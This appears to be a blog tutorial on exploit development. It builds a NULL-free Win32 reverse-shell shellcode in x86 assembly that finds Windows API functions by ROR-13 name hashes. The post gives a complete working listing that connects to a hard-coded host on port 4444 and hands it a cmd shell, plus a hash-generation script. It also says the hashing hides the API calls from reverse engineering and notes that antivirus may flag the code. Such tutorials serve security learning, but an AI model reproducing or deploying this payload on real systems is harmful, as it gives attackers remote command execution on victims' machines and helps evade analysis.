Win32 Shellcode - Hashed Reverse Shell

11 minute read


Introduction

In the last post we wrote a reverse shell using LoadLibraryA and GetProcAddress to find a word defined function address in memory. This example is a straight forward process to obtain a shellcode for our porposes but the algorithm just discussed has a weakness: It performs a strcmp against each export name until it finds the correct one. This requires that the full name of each API function the shellcode uses be included as an ASCII string. When the size of the shellcode is constrained, these strings could push the size of the shellcode over the limit.
A common way to address this problem is to calculate a hash of each symbol string and compare the result with a precomputed value stored in the shellcode. The hash function does not need to be sophisticated; it only needs to guarantee that within each DLL used by the shellcode, the hashes that the shellcode uses are unique. Hash collisions between symbols in different DLLs and between symbols the shellcode does not use are fine. The most common hash function is the 32-bit rotate-right-additive hash.
In this post we’ll using hashed name to find functions.

hashString:
    push esi
    push edi
    mov esi, dword [esp+0x0c]   ; load function argument in esi
calc_hash:
    xor edi, edi
    cld
hash_iter:
    xor eax, eax
    lodsb                       ; load next byte of input string
    cmp al, ah
    je  hash_done               ; check if at end of symbol
    ror edi, 0x0d               ; rotate right 13 (0x0d)
    add edi, eax
    jmp hash_iter
hash_done:
    mov eax, edi
    pop edi
    pop esi
    ret                         ; use ret against retn 8 that produce NULL bytes

This function calculates a 32-bit DWORD hash value of the string pointer argument. The EDI register is treated as the current hash value, and is initialized to zero. Each byte of the input string is loaded via the lodsb instruction at lodsb. If the byte is not NULL, the current hash is rotated right by 13 0x0d in hex, and the current byte is added into the hash. This hash is returned in EAX so that its caller can compare the result with the value compiled into the code.
This PE parsing ability instead of GetProcAddress approach has the additional benefit of making reverse-engineering of the shellcode more difficult. The hash values hide the API calls used from casual inspection.

findSymbolByHash:
    pushad
    mov ebp, [esp + 0x24]       ; load 1st arg: dllBase
    mov eax, [ebp + 0x3c]       ; get offset to PE signature
    ; load edx w/ DataDirectories array: assumes PE32
    mov edx, [ebp + eax + 4+20+96]
    add edx, ebp                ; edx:= addr IMAGE_EXPORT_DIRECTORY
    mov ecx, [edx + 0x18]       ; ecx:= NumberOfNames
    mov ebx, [edx + 0x20]       ; ebx:= RVA of AddressOfNames
    add ebx, ebp                ; rva->va
search_loop:
    dec ecx                     ; dec loop counter

    ; esi:= next name, uses ecx*4 because each pointer is 4 bytes
    mov esi, [ebx+ecx*4]
    add esi, ebp                ; rva->va
    push esi
    call edi                    ; call hashString to obtain the current string
    add sp, 4                   ; avoid NULL bytes 

    ; check hash result against arg #2 on stack: symHash
    cmp eax, [esp + 0x28]
    jnz search_loop

    ; at this point we found the string in AddressOfNames
    mov ebx, [edx+0x24]         ; ebx:= ordinal table rva
    add ebx, ebp                ; rva->va

    ; turn cx into ordinal from name index.
    ; use ecx*2: each value is 2 bytes

    mov cx, [ebx+ecx*2]
    mov ebx, [edx+0x1c]         ; ebx:= RVA of AddressOfFunctions
    add ebx, ebp                ; rva->va

    ; eax:= Export function rva. Use ecx*4: each value is 4 bytes
    mov eax, [ebx+ecx*4]
    add eax, ebp                ; rva->va
done:
    mov [esp + 0x1c], eax       ; overwrite eax saved on stack
    popad
    ret                         ; use ret against retn 4 that produce NULL bytes

The code begins parsing the PE file to get the pointer to the PE signature. A pointer to IMAGE_EXPORT_DIRECTORY is created by adding the correct offset, assuming this is a 32-bit PE file. The code begins parsing the IMAGE_EXPORT_DIRECTORY structure, loading the NumberOfNames value and the AddressOfNames pointer. Each string pointer in AddressOfNames is passed to the hashString function, and the result of this calculation is compared against the value passed as the function argument. Once the correct index into AddressOfNames is found, it is used as an index into the AddressOfNameOrdinals array to obtain the corresponding ordinal value, which is used as an index into the AddressOfFunctions array. This is the value the user wants, so it is written to the stack, overwriting the EAX value saved by the pushad instruction so that this value is preserved by the following popad instruction.
To calculate the hash string of ours function we can use a simple script found on StackExchange

#!/usr/bin/python
import sys

if len(sys.argv) == 2:

	def rol32(val, amt):
	        return ( (val << amt) & 0xffffffff ) | ( ( val >> (32 - amt) ) & 0xffffffff )

	def ror32(val, amt):
	        return ( (val >> amt) & 0xffffffff ) | ( ( val << (32 - amt) ) & 0xffffffff )

	def add32(val, amt):
	        return (val + amt) & 0xffffffff

	def hash_export(name):
	    result = 0
	    index = 0
	    while(index < len(name)):
	        result  = add32(ror32(result, 13), ord(name[index]) & 0xff)
	        index += 1
	    return result

        def main():
            print hex(hash_export(sys.argv[1]))

if __name__ == '__main__':
	main()

The original one makes a right rotation but we can also use a left rotation or can use shift instead of rotation. It’s manadatory that all changes made on the script must be done also in the ASM shellcode.


The shellcode

First thing we choosed to load the hashString and findSymbolByHash addresses respectively in EBP and EDI registers to avoid NULL bytes produced by calling directly this function during the process, secondly by using the PE parsing, we choosed to find and store all the necessary functions addresses at the begin of our shellcode and use ESI register like a base offset for our saved addresses.
Last thing, we used a lot of code of previous shellcode, probably some pieces could be optimized.
The shellcode works on both x86 Win 7 and Win 10 but assuming the fact:

The particular algorithm has become commonly used due to its inclusion in Metasploit, but variations that use different rotation amounts and hash sizes are sometimes seen.

You must note that this could makes our shellcode marked as malicious by Windows Defender AV and others AV and IDS/IPS/ATP agents :) You could read an interesting article on Fireeye blog, about this argument.

global _start

section .text
_start:

 ; this avoid the NULL bytes producted by calling functions directly
 mov ebp, findSymbolByHash
 mov edi, hashString

getKernel32Base:
    xor ecx, ecx                ; zeroing register ECX
    mul ecx                     ; zeroing register EAX EDX
    mov eax, [fs:ecx + 0x030]   ; PEB loaded in eax
    mov eax, [eax + 0x00c]      ; LDR loaded in eax
    mov esi, [eax + 0x014]      ; InMemoryOrderModuleList loaded in esi
    lodsd                       ; program.exe address loaded in eax (1st module)
    xchg esi, eax               
    lodsd                       ; ntdll.dll address loaded (2nd module)
    mov ebx, [eax + 0x10]       ; kernel32.dll address loaded in ebx (3rd module)
    mov eax, ebx
    
    ; EAX 76140000 kernel32.76140000
    ; ECX 00000000
    ; EDX 00000000
    ; EBX 76140000 kernel32.76140000
    ; ESP 0022FF8C
    ; EBP 0022FF94
    ; ESI 0054190C
    ; EDI 00000000
    ; EIP 00401005 reverse_.00401005

    push 0xec0e4e8e          ; LoadLibraryA hash
    push eax
    call ebp                 ; call findSymbolByHash
 
    ; EAX 76192864 kernel32.LoadLibraryA
    ; ECX 00000000
    ; EDX 00000000
    ; EBX 76140000 kernel32.76140000
    ; ESP 0022FF8C
    ; EBP 0022FF94
    ; ESI 0054190C
    ; EDI 00000000
    ; EIP 00401010 reverse_.00401010

    
getws2_32:
    push 0x61613233                 ; 23
    sub word [esp + 0x2], 0x6161    ; sub aa from aa23_2sw
    push 0x5f327377                 ; _2sw
    push esp                        ; pointer to the string
    call eax                        ; call Loadlibrary and find ws2_32.dll
    mov edx, eax                    ; save winsock handle for future puproses

    ; EAX 75FE0000 OFFSET ws2_32.#332
    ; ECX 77BE316F ntdll.77BE316F
    ; EDX 75FE0000 OFFSET ws2_32.#332
    ; EBX 760C0000 kernel32.760C0000
    ; ESP 0022FF84 ASCII "ws2_32"
    ; EBP 004010F7 reverse_.004010F7
    ; ESI 0054190C
    ; EDI 00401140 reverse_.00401140
    ; EIP 00401040 reverse_.00401040

getWSAStartup:
    push 0x3bfcedcb                 ; WSAStartup hash
    push edx                        ; push ws2_32.dll handler
    call ebp                        ; find WSAStartup in ws2_32.dll handler
    add sp, 8
    push eax
    lea esi, [esp]
    mov [esi+0x4], eax

getWSASocketA:
    push 0xadf509d9                 ; WSASocketA hash
    push edx                        ; push ws2_32.dll handler
    call ebp                        ; find WSASocketA in ws2_32.dll handler
    add sp, 8
    mov [esi+0x8], eax

getConnect:
    push 0x60aaf9ec                 ; connect hash
    push edx                        ; push ws2_32.dll handler
    call ebp                        ; find connect in ws2_32.dll handler
    add sp, 8
    mov [esi+0xc], eax

getCreateProcessA:
    push 0x16b3fe72                 ; CreateProcessA hash
    push ebx                        ; push kernel32.dll handler
    call ebp                        ; find CreateProcessA in kernel32.dll handler
    add sp, 8
    mov [esi+0x10], eax

getExitProcess:
    push 0x73e2d87e          ; ExitProcess hash
    push ebx                 ; kernel32 dll location
    call ebp    
    add sp, 8
    mov [esi+0x14], eax         
    
callWSAStartUp:
    xor edx, edx
    mov dx, 0x190          ; EAX = sizeof( struct WSAData )
    sub esp, edx           ; alloc some space for the WSAData structure
    push esp               ; push a pointer to this stuct
    push edx               ; push the wVersionRequested parameter
    call dword [esi+0x4]   ; call WSAStartup(MAKEWORD(2, 2), wsadata_pointer)

callWSASocketA:
    xor edx, edx                    ; clear edx
    push edx;                       ; dwFlags=NULL
    push edx;                       ; g=NULL
    push edx;                       ; lpProtocolInfo=NULL
    mov dl, 0x6                     ; protocol=6
    push edx
    sub dl, 0x5                     ; edx==1
    push edx                        ; type=1
    inc edx                         ; af=2
    push edx
    call dword [esi+0x8]            ; call WSASocketA
    push eax                        ; save eax in edi
    pop edi                         ; 

callConnect:
    ;set up sockaddr_in
    mov edx, 0xed02a9c1             ;the IP plus 0x11111111 so we avoid NULLs (IP=192.168.1.236)
    sub edx, 0x01010101             ;subtract from edx to obtain the real IP
    push edx                        ;push sin_addr
    push word 0x5c11                ;0x115c = (port 4444)
    xor edx, edx
    mov dl, 2
    push dx 
    mov edx, esp
    push byte 0x10
    push edx
    push edi
    call dword [esi+0xc] 

shell:
    push 0x61646d63                 ; push admc
    sub word [esp + 0x3], 0x61      ; sub a to admc = dmc
    mov ebp, esp                    ; save a pointer to the command line
    push edi                        ; our socket becomes the shells hStdError
    push edi                        ; our socket becomes the shells hStdOutput
    push edi                        ; our socket becomes the shells hStdInput
    xor edi, edi                    ; Clear edi for all the NULL's we need to push
    push byte 0x12                  ; We want to place (18 * 4) = 72 null bytes onto the stack
    pop ecx                         ; Set ECX for the loop

push_loop:
    push edi                        ; push a null dword
    loop push_loop                  ; keep looping untill we have pushed enough nulls
    mov word [esp + 0x3C], 0x0101   ; Set the STARTUPINFO Structure's dwFlags to STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW
    mov byte [esp + 0x10], 0x44
    lea ecx, [esp + 0x10]  ; Set EAX as a pointer to our STARTUPINFO Structure

    ;perform the call to CreateProcessA
    push esp               ; Push the pointer to the PROCESS_INFORMATION Structure 
    push ecx               ; Push the pointer to the STARTUPINFO Structure
    push edi               ; The lpCurrentDirectory is NULL so the new process will have the same current directory as its parent
    push edi               ; The lpEnvironment is NULL so the new process will have the same enviroment as its parent
    push edi               ; We dont specify any dwCreationFlags 
    inc edi                ; Increment edi to be one
    push edi               ; Set bInheritHandles to TRUE in order to inheritable all possible handle from the parent
    dec edi                ; Decrement edi back down to zero
    push edi               ; Set lpThreadAttributes to NULL
    push edi               ; Set lpProcessAttributes to NULL
    push ebp               ; Set the lpCommandLine to point to "cmd",0
    push edi               ; Set lpApplicationName to NULL as we are using the command line param instead
    call dword [esi+0x10]

callExitProcess:
    xor  edx, edx
    push edx                ; uExitCode
    call dword [esi+0x14]   ; call ExitProcess(0)

;----------------------------------------------------------;
; Functions called                                         ;
;----------------------------------------------------------;


findSymbolByHash:
    pushad
    mov ebp, [esp + 0x24]       ; load 1st arg: dllBase
    mov eax, [ebp + 0x3c]       ; get offset to PE signature
    ; load edx w/ DataDirectories array: assumes PE32
    mov edx, [ebp + eax + 4+20+96]
    add edx, ebp                ; edx:= addr IMAGE_EXPORT_DIRECTORY
    mov ecx, [edx + 0x18]       ; ecx:= NumberOfNames
    mov ebx, [edx + 0x20]       ; ebx:= RVA of AddressOfNames
    add ebx, ebp                ; rva->va
search_loop:
    dec ecx                     ; dec loop counter

    ; esi:= next name, uses ecx*4 because each pointer is 4 bytes
    mov esi, [ebx+ecx*4]
    add esi, ebp                ; rva->va
    push esi
    call edi              ; hash the current string
    add sp, 4

    ; check hash result against arg #2 on stack: symHash
    cmp eax, [esp + 0x28]
    jnz search_loop

    ; at this point we found the string in AddressOfNames
    mov ebx, [edx+0x24]         ; ebx:= ordinal table rva
    add ebx, ebp                ; rva->va

    ; turn cx into ordinal from name index.
    ; use ecx*2: each value is 2 bytes

    mov cx, [ebx+ecx*2]
    mov ebx, [edx+0x1c]         ; ebx:= RVA of AddressOfFunctions
    add ebx, ebp                ; rva->va

    ; eax:= Export function rva. Use ecx*4: each value is 4 bytes
    mov eax, [ebx+ecx*4]
    add eax, ebp                ; rva->va
done:
    mov [esp + 0x1c], eax       ; overwrite eax saved on stack
    popad
    ret


hashString:
    push esi
    push edi
    mov esi, dword [esp+0x0c]   ; load function argument in esi
calc_hash:
    xor edi, edi
    cld
hash_iter:
    xor eax, eax
    lodsb                       ; load next byte of input string
    cmp al, ah
    je  hash_done               ; check if at end of symbol
    ror edi, 0x0d               ; rotate right 13 (0x0d)
    add edi, eax
    jmp hash_iter
hash_done:
    mov eax, edi
    pop edi
    pop esi
    ret


The shellcode is NULL free.

References